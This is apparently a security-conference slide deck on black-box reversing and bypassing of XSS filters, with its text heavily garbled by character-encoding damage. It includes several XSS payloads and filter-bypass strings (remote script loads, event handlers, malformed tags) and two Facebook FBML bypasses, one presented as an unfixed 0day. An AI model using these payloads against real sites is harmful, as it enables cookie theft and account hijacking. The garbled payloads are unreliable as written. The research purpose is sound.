Blackbox Reversing of XSS Filters

Alexander Sotirov
alex@sotirov.net

Web applications are the future

Reversing eb apps

blackbox reversing

ver! different environ"ent and tools

#ross$site scripting %XSS&

the 'strcp!( of eb app develop"ent

reversing and b!passing XSS filters

)ntroduction

*ser generated content and Web +.,

)"ple"enting XSS filters

Reversing XSS filters

XSS in Facebook
-vervie
.art )
*ser generated content
and Web +.,
Web +.,

*ser generated content

A.)s

/ashups

Aggregation of untrusted content

Significantl! increased attack surface

*ser generated content

0ext

.laintext

1ighteight "arkup %BBcode2 Wikipedia&

1i"ited 30/1

Full 30/1 and 4avaScript

)"ages2 sound2 video

Flash
Attacker generated content

Social netorking

Sa"!5s /!Space or"

"ultiple -rkut or"s2 stealing bank info

Web"ail

3ot"ail and 6ahoo /ail cross$site scripting

or" ritten b! Sk!1ined in +,,+

"an! S7uirrel/ail cross$site scripting bugs

Blogs

hacking Word.ress ith XSS

#ross site scripting %XSS&
Re7uest8
http://www.example.com/?name=<script>alert('XSS')</script>
Response8
<html>
<body>
<p>Hello <script>alert('XSS')</script></p>
</body>
</html>
Web securit! "odel
Sa"e origin polic!
.revents scripts fro" one do"ain fro"
"anipulating docu"ents loaded fro"
other do"ains
#ross site scripting allos us to execute
arbitrar! scripts on a page loaded fro"
another do"ain
What can XSS do9

Stealing data fro" eb pages

#apturing ke!strokes on a eb page

Stealing authentication cookies

Arbitrar! 300. re7uests ith

X/13ttpRe7uest
.art ))
)"ple"enting XSS filters
XSS filters
:oal8

Re"ove all scripts fro" untrusted 30/1

#hallenges8

/an! 30/1 features that allo scripting

.roprietar! extensions to 30/1

.arsing invalid 30/1

Broser bugs
Features that allo scripting
Script tags
<script src=!http://www.example.com/xss."s!>
;vent handler attributes
<body onload=!alert('XSS')!>
#SS
<p style=!bac#$ro%nd:%rl('"a&ascript:alert(')')!>
*R1s
<im$ src=!"a&ascript:alert('XSS')!>
.roprietar! extensions to 30/1
X/1 data islands %);&
<xml src=!http://www.example.com/xss.xml! id=!x!>
<span datasrc=!(x! data)ld=!c! data)ormatas=!html!>
4avaScript expressions in attribute %<S=&
<p id=!*+alert('XSS'),!>
#onditional co""ents %);&
<-../i) $te 01 23>
<script>alert('XSS')</script>
<-/endi)3..>
.arsing invalid 30/1
<<scr45ipt/src=http://xss.com/xss."s></script

extra '>' before opening tag

<*11 b!te inside tag na"e

'?' separator beteen tag and attribute

no 7uotes around attribute value

"issing '@' in closing tag

Broser behavior is not docu"ented or
standardiAed. );B parses this as8
<script src=!http://xss.com/xss."s!></script>
Broser bugs
)nvalid *0FC handling in )nternet ;xplorer D
<body )oo=!4x65! bar=! onload=alert(')7//!>
Firefox and );B8
<body )oo=!?!
bar=! onload=alert(')7//!>
);D8
<body )oo=!? bar=!
onload=alert(')7//!>
Attribute parsing in Firefox > +.,.,.+
<body onload-(89*():;<.=.>:7??//@43AB=alert(!XSS!)>
)"ple"enting XSS filters

String "atching filters

30/1 E-/ parsers

#anonicaliAation

Whitelisting
String "atching filters
Re"ove all script tags8
s/<script>//$7
B!passes8

)nvalid 30/1 accepted b! brosers

;ncoding of attribute values and *R1s

*sing the filter against itself8

<scr<script>ipt>

)nco"plete blacklists
30/1 E-/ parsers
<body onload=!alert(')!>
<script>alert(C)</script>
<p>Hello</p>
</body>
#anonicaliAation
F. Build a E-/ tree fro" the input strea"

handle invalid *0FC se7uences

Appl! XSS filters to the E-/ tree

-utput the E-/ tree in a canonical for"

escape special characters

add closing tags here necessar!

Whitelisting
Blacklisting

re"ove knon bad tags and attributes

"ust be F,,G co"plete to be safe

Whitelisting

allo onl! knon safe tags and attributes

safer than blacklisting

.art )))
Reversing XSS filters
Reversing XSS filters

Re"ote eb applications

no access to source code or binaries

FuAAing

li"ited b! bandidth and re7uest latenc!

dras attention

Blackbox reversing

send input and inspect the output

build a filter "odel based on its behavior

)terative "odel generation
F. Build an initial "odel of the filter
+. :enerate a test case
H. Send test case and inspect the result
=. *pdate the "odel
I. :o to step +
;xa"ple of parser reversing
0est case8
('..5xDD).each + @x@
data << !<p (+x.chr,a=''></p>!
,
Results8

hitespace regexp
/4x5E4t4r4n !'/3<

attribute na"e regexp

/a.FG.H5.I:.=3<
refltr.rb

Fra"eork for XSS filter reversing

run a set of tests against a eb application

store the results

"anual anal!sis of the output

result diffing

Application "odules

abstract application specific details

sending data2 result parsing2 error detection

0est "odules

test generation functions

*sing the "odel

:ra""ar based anal!sis

build a gra""ar for the filter output

build a gra""ar for the broser parser

find a valid sentence in both gra""ars that

includes a >script@ tag

Rei"ple"ent the filter and fuAA it locall!

.art )J
XSS in Facebook
Facebook platfor"

0hird part! applications

application pages

content in user profiles

"essage and all post attach"ents

FB/1

30/1 ith a fe restrictions

li"ited st!le sheet and scripting support

FB4S

sandboxed 4avaScript
FB/1 processing
broser apps.facebook.co" funapp.exa"ple.co"
30/1 FB/1
:;0 ?funapp?foo.ht"l :;0 ?foo.ht"l

Facebook serves as a prox! for

application content

FB/1 processing8

special FB/1 tags are replaced ith 30/1

non$supported 30/1 tags are re"oved

scripts are sandboxed

Reversing the FB/1 parser
apps.facebook.co"
refltr.rb
apache
rite test case in
?var?
30/1
FB/1

30/1 E-/ parser

Accepts and fixes invalid input

#anonicaliAed output

Whitelist of tags2 blacklist of attributes

Facebook XSS
)nvalid *0FC se7uences

input is parsed as AS#))

300. response headers specif! *0FC encoding

affects onl! );D

ode8
im$ src=!J! )oo=!4x65! bar=!onload=alert(')7//!>
eported and fixed in Februar!.
0his is here ) drop the ,da!
Attribute na"e parsing

"is"atch beteen Facebook and Firefox parsers

affects onl! Firefox > +.,.,.+

ode8
im$ src=!J! onload:=!alert(')!>
ot reported2 Facebook is still vulnerable.
Facebook Ee"o
.art J
#onclusion
#onclusion

Web +., sites are totall! screed

broken eb securit! "odel

undocu"ented broser behavior

no progra""ing language support

Blackbox reversing

the onl! a! to reverse "ost eb apps

e need better tools and auto"ation

Kuestions9
alex@sotirov.net